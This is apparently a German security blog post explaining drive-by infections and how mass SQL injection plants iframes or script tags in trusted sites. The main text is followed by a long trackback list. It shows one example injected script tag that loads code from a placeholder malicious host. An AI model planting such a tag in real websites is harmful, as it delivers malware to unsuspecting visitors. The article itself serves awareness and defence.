Drive-by-Infektionen - Gefahren drohen überall
Drive-by-Infektionen sind die zur Zeit wohl größte Bedrohung im
Web: In eigentlich vertrauenswürdige Websites eingeschleuste iframes
oder script
-Tags versuchen, auf den Rechnern der Besucher
Schadsoftware einzuschleusen. Und auch außerhalb des Webs lauert
diese Gefahr: Cyberkriminelle können ihre Opfer über E-Mails
auf präparierte Seiten locken, wie es z.B. im Rahmen der "Operation
Aurora" genannten gezielten Angriffe auf Google und andere Unternehmen
eindrucksvoll vorgeführt wurde. Und Sophos
berichtet
über Spam-Mails, deren HTML-Anhänge außer dem Spam
zusätzlich einen unsichtbaren iframe zum Einschleusen von Schadcode
enthalten.
Der klassische Fall: Kompromittierte Websites
Im klassischen Fall der kompromittierten Websites erfolgt der Angriff in zwei Schritten: Zuerst wird eine normalerweise vertrauenswürdige Webseite so manipuliert, das sie bösartigen JavaScript-Code enthält. Danach wird von diesem JavaScript-Code in einem oder mehreren Schritten der eigentliche Schadcode auf dem Rechner des ahnungslosen Besuchers eingeschleust. Für diese Angriffe hat sich der Begriff Drive-by-Download oder Drive-by-Infektion eingebürgert, wobei ich den zweiten für passender halte - Drive-by-Download klingt zu harmlos.
Die Installation des Schadcodes erfolgt ohne Zutun des Benutzers, der i.A.
nicht einmal bemerkt, was da gerade passiert. In einem
script
-Tag oder über einen iframe wird ein
JavaScript-Skript eingebunden, das dann versucht, über eine mehr oder
weniger großer Anzahl an Exploits zur Ausnutzung aktueller und auch
älterer Schwachstellen den Schadcode einzuschleusen. Ist dieser erste
Schadcode, der sog. Downloader, auf dem Rechner installiert, lädt er
weiteren Code nach, der verschiedenen Zwecken dienen kann. Vom
Ausspähen von Zugangsdaten bis zur Integration des Rechners in ein
Botnet
ist dann alles möglich. Manche Schädlinge laden bei
Bedarf auch weiteren Code nach, so dass ein ausspionierter Rechner
anschließend noch als Teil eines Botnets dienen kann.
Das erste Opfer: Der Webserver
Im Juni 2010 liefen laut Sucuri Security mindestens zwei groß angelegte SQL-Injection-Angriffe auf ASP.NET-Websites, die Code für Drive-by-Infektionen einschleusten. Das ist eigentlich nichts Neues, das gab es genau so auch schon 2008. Die SQL-Injection-Angriffe nutzen keine Schwachstellen in bestimmten Anwendungen oder Erweiterungen aus, sondern sind allgemein gegen alle ASP-Anwendungen gerichtet. Gibt es darin eine SQL-Injection-Schwachstelle, fällt sie dem Angriff zum Opfer. Sophos hat am 4. Juli über eine mögliche weitere Welle von SQL-Injection-Angriffen berichtet.
Der Klassiker: SQL-Injection
Die SQL-Injection-Angriffe folgen meist einem einheitlichen Muster: Alle
geeigneten Datenbankfelder werden mit iframes oder script
-Tags
zum Nachladen von Schadcode gefüllt, in der Hoffnung, dass mindestens
eines der Felder ohne weitere Prüfung oder Bearbeitung ausgegeben
wird. Dabei werden Systemtabellen und z.B. rein numerische Felder
ignoriert und nur die einem normalen Benutzer gehörenden Tabellen und
darin die Felder mit Textwerten etc. manipuliert. Werden die Werte daraus
dann später unverändert an die Besucher der Website ausgegeben,
wird der eingeschleuste Code im Webbrowser der Benutzer ausgeführt
und JavaScript-Schadcode zum Ausnutzen verschiedener Schwachstellen
nachgeladen.
Wie viele Websites ungefähr Opfer einer Angriffswelle geworden sind,
verraten die Suchmaschinen: Da der iframe oder script
-Tag in
alle passenden Felder eingeschleust wird, sind regelmäßig auch
welche dabei, die an Stellen ausgegeben werden, an denen diese Tags laut
HTML-Standard nicht vorgesehen sind und daher auch nicht ausgewertet
werden, z.B. innerhalb des title
-Tags. Sucht man nach dem
eingeschleusten Code, z.B.
<script src=http://www.boeser-server.example/pfad/zum/skript.js></script>
werden die Seiten mit dem entsprechenden iframe oder
script
-Tag ausgegeben.
Es gibt mehrere Tools, sog. Exploit-Kits, die von den Cyberkriminellen zur Vorbereitung und Durchführung derartiger Angriffe genutzt werden können. Dabei können sowohl die anzuwendenden Exploits als auch die anzugreifenden Websites komfortabel ausgewählt und die Angriffe konfiguriert werden. Danach muss der Kriminelle nur noch darauf warten, dass die verteilte Schadsoftware sich mit seinem Server verbindet. Die Manipulation der harmlosen Websites und die Angriffe auf deren Besucher laufen automatisch ab.
In der
nächsten Folge
werde ich einen SQL-Injection-Angriff zum Einschleusen eines iframes oder
script
-Tags genauer beschreiben.
Übersicht über alle Artikel zum Thema
- Drive-by-Infektionen - Gefahren drohen überall
- Drive-by-Infektionen durch SQL-Injection vorbereitet
- Drive-by-Infektionen: So kommt der Schadcode auf den Server
- Drive-by-Infektionen - Vom Server auf den Client
- Drive-by-Infektionen - Ein Blick auf die Exploits
- Drive-by-Infektionen erkennen und abwehren
- LizaMoon - Massenhack mit minimalen Folgen
- Aktuelles: LizaMoon auf Apples iTunes-Seiten
- Drive-by-Infektionen über präparierte Werbung
Trackbacks
Dipl.-Inform. Carsten Eilers am : Phishing mit Tabs: Tabnabbing
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Angst einflößende Schadsoftware: Scareware
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 10 Tage, 4 0-Day-Schwachstellen - Cyberkriminelle in Jahresendpanik?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 2010 - Ein Rückblick auf ein ereignisreiches Jahr
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Gezielter Angriff auf RSA mit unabsehbaren Folgen
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Die Rückkehr des Exploit-Thursday
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Warum Sie ihre Website auf Schwachstellen testen sollten
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : iPhone Jailbreak - Gut gemeint ist nicht immer gut gemacht
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Likejacking - Facebook im Visier der Cyberkriminellen
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Onlinebanking: Cyberkriminelle reagieren auf Chip- und SMS-TAN
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Die smsTAN ist tot, der SMS-Dieb schon da!
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Digitale Schutzimpfung
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Clickjacking gegen Flash, urchin.js und Duqu - nichts als Wiederholungen!
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Wie gefährlich ist die Duqu-0-Day-Schwachstelle?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Lilupophilupop - Eine SQL-Injection-Welle ist unterwegs
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : "DNS-Changer" - welcher DNS-Changer ist gemeint?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Exploit-Kit über Wordpress Version 3.2.1 verbreitet
Vorschau anzeigen
www.supernature-forum.de am : PingBack
Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.Dipl.-Inform. Carsten Eilers am : CeBIT 2012 - Alles wird gut!
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Macs im Visier
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Zeus, Carberp und Khelios - Drei Schläge gegen Botnets
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Das Flashback-Botnet und Apples Langsamkeit
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : "Für den Mac gibt es keine Viren"? - Weg mit den Mythen!
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Ein bekannter Advanced Persistent Threat: Operation Aurora
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Neues zu Flashback & Co. und WordPress
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Macs und Schadsoftware, in allen möglichen Varianten
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Reaktionen
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kann man Advanced Persistent Threats erkennen?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kommentare zu SQL-Injection-Massenhacks, Drive-by-Infektionen und Exploit-Kits
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Ungewöhnlich: Drive-by-Infektionen über 0-Day-Exploits
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Advanced Persistent Threats gegen tibetische Aktivisten und mehr
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Google Hacking - The Next Generation
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : SQL-Injection im Schnelldurchlauf
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kommentare zu diesem und jenem...
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Angriffe über zwei 0-Day-Schwachstellen in Java
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Die aktuelle 0-Day-Schwachstelle im Internet Explorer
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kommentare zu Flame, einem neuen Wurm, einem auf Java spezialisierten Exploit-Kit und mehr
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Eurograbber beweist: mTANs gefährden Ihr Bankkonto!
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : HTML5 Security - postMessage() sicher nutzen
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 0-Day-Schwachstelle im Internet Explorer, Ausgabe Dezember 2012
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: Windows.Developer 2.2013 - SQL Injection
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: PHP Magazin 2.2013 - Drive-by-Infektionen
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Java 0-Day-Schwachstelle nach 3 Tagen behoben
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Pwn2Own: Safari ignoriert, alles andere gehackt
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Schwachstelle in Mac OS X erlaubte Java-Angriffe ohne Java-Plug-In
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: Windows.Developer 4.2013 - Wie sicher ist das Tablet?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kommentare zu PostgreSQL, Ad-Blockern, AT&T Passwortregeln und mehr
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Code Signing - Auch Schadsoftware kann signiert sein
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kommentare rund um Schadsoftware, SSL und Googles Glass
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Was haben Flame, gepackte Windows-Systemdateien und die "Operation Aurora" gemeinsam?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Microsoft aktualisiert Security Bulletin: Erneut 0-Day-Schwachstelle im IE
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Schutzmaßnahmen: Content Security Policy gegen XSS, Teil 3
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Ein paar kommentierte Links zum Wochenanfang
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 0-Day-Schwachstelle im Internet Explorer, die dritte
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : IE: Ein 0-Day-Exploit für zwei Angriffe?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : php.net war für Drive-by-Infektionen präpariert
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 0-Day-Schwachstelle in Microsoft Graphics betrifft Office und Windows
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 0-Day-Exploit für Internet Explorer entdeckt
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kommentare zu neuen Angriffen über die 0-Day-Schwachstelle in MS Graphics und mehr
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Die 0-Day-Schwachstelle in Windows XP oder Microsofts Workaround - was ist gefährlicher?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Der 0-Day-Patchday am 10.12.2013: 4x Microsoft, 1x Adobe
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 2013 - Das Jahr der 0-Day-Exploits
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: PHP Magazin 2.2014 - Angriffsziel Webbrowser
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Es ist da: Mein Buch "iOS Security - Sichere Apps für iPhone und iPad"
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: windows.developer Magazin 3.2014 - JavaScript in Angreiferhand
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kommentare zu trickreichen Drive-by-Infektionen und mehr
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Linksys, AVM, Asus - Router in Gefahr
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Dritter 0-Day-Exploit für den Internet Explorer in 2014 entdeckt
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Schutz ohne Antivirus-Software ist möglich
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Eine neue 0-Day-Schwachstelle im IE, diesmal ohne Angriff darauf
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : SCADA-Systeme und Industriesteuerungen auf den Sicherheitskonferenzen ab 2013
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 0-Day-Exploits für Adobe Reader, Acrobat und IE - Ausgabe August 2014
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Kommentare zum iCloud-Angriff, Heartbleed-Angriffen und Angriffen über Werbung
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Neues eBook: Android Security - Von Fake-Apps, Trojanern und Spy Phones
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Neues zu den 0-Day-Exploits, besonders bösartige Werbung und mehr
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: windows.developer Magazin 12.2014 - JavaScript und die Sicherheit
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : WireLurker, Schritt 1: Der Angriff auf den Mac
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Neues eBook: "JavaScript Security - Sicherheit im Webbrowser"
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Einige kommentierte Updates zu älteren Artikeln
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Cross-Site Scripting im Überblick, Teil 6: Informationen einschleusen
Vorschau anzeigen
entwickler.de am : PingBack
Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.Dipl.-Inform. Carsten Eilers am : Virenscanner und Co. - Pro und Contra
Vorschau anzeigen
entwickler.de am : PingBack
Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.Dipl.-Inform. Carsten Eilers am : Drucksache: Windows Developer 8.15 - Einstieg in die Welt der Exploits
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : XSS-Angriffe, Teil 12: Browser-basierte Botnets
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Neue 0-Day-Exploits für Flash Player (2 Stück) und Java entdeckt
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Transitive Trojanische Pferde wie XcodeGhost als neue Gefahr?
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: Entwickler Magazin 6.15 - Identitätsmissbrauch
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Neues eBook: "Datensicherheit"
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: Windows Developer 1.16 - Edge und die Sicherheit
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : 0-Day-Exploit für Flash Player unterwegs, Patch angekündigt
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Den 0-Day-Exploit des Dezembers präsentiert mal wieder Adobe
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : Drucksache: Windows Developer 2.17 - Websecurity 2016: Browser und Webclient
Vorschau anzeigen
entwickler.de am : PingBack
Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.Dipl.-Inform. Carsten Eilers am : Identitätsdiebstahl Teil 3 - Noch mehr Identitäten einsammeln
Vorschau anzeigen